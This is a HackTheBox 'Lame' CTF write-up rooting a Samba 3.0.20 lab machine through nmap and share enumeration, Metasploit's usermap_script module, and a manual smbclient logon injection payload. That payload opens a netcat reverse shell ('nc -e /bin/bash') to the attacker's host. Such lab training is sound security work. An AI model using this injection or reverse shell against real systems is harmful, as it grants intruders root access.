HackTheBox Lame Writeup

Enjoy reading my HTB Lame Writeup

HackTheBox Lame Walkthrough

HackTheBox is a popular service that offers CTF-like machines to let infosec professionals improve their current skills or learn new ones. HTB Lame is a machine recommended if you want to take the OSCP exam.

This walkthrough contains two different ways of rooting the machine, one with the help of the Metasploit-framework, the other one without.

Information Gathering

First, let's begin with a nmap scan:

sudo nmap -p 1-5000 -sC -sV -v 10.10.10.3

This gives us the following information:

Port 21: vsFTPd 2.3.4
Port 22: OpenSSH
Port 139 and 445: Samba smbd 3.X-4.X
Port 3632: distccd v1

Let's enumerate the Samba shares using smbmap:

smbmap -H 10.10.10.3

Gives us the following output:

0[+] IP: 10.10.10.3:445	Name: 10.10.10.3                                        
1        Disk                                                  	Permissions	Comment
2	----                                                  	-----------	-------
3	print$                                            	NO ACCESS	Printer Drivers
4	tmp                                               	READ, WRITE	oh noes!
5	opt                                               	NO ACCESS	
6	IPC$                                              	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))
7	ADMIN$                                            	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))

We can acess the tmp share using smbclient:

smbclient \\\\10.10.10.3\\tmp

but the files on the share do not seem to be interesting or useful.

Next, let's try to enumerate FTP using the anonymous account:

 0└──╼ $ftp 10.10.10.3
 1Connected to 10.10.10.3.
 2220 (vsFTPd 2.3.4)
 3Name (10.10.10.3:user): Anonymous
 4331 Please specify the password.
 5Password:
 6230 Login successful.
 7Remote system type is UNIX.
 8Using binary mode to transfer files.
 9ftp> ls
10200 PORT command successful. Consider using PASV.
11150 Here comes the directory listing.
12226 Directory send OK.
13ftp> passive
14Passive mode on.
15ftp> ls
16227 Entering Passive Mode (10,10,10,3,60,72).
17150 Here comes the directory listing.
18226 Directory send OK.
19ftp> pwd
20257 "/"
21ftp>

But there is no interesting information as well.

Pwning the machine using metasploit

First, start metasploit using msfconsole.

Now you can search for an exploit that matches the running version of samba:

search Samba 3.0.20

now either use

use 0 or use exploit/multi/samba/usermap_script to load the exploit.

Configure the options:

set RHOSTS 10.10.10.3 set LHOST 10.10.14.4

and start the attack with run.

You will get a reverse shell with root privileges.

Now you can read the root flag in /root/. To locate the user flag you can use find / -name user.txt -type f 2>/dev/null.

Pwn without metasploit

To gain root access without the help of metasploit connect to the tmp share using smbclient.

Then start a netcat listener (nc -lvnp 4545) and then abuse the logon command of smbclient to exploit the machine.

For my exploit, I took a piece of code from this ruby script.

To be more specific this was my final looking exploit for HackTheBox Lame:

0/=`nohup nc -e /bin/bash 10.10.14.4 4545 `"

Which i used together with the logon command:

0logon /=`nohup nc -e /bin/bash 10.10.14.4 4545 `"

This spawned a shell with root privileges.

The root flag is located in /root and the user flag can be found with find / -name user.txt -type f 2>/dev/null.

Tags:

htb, lame, hackthebox, samba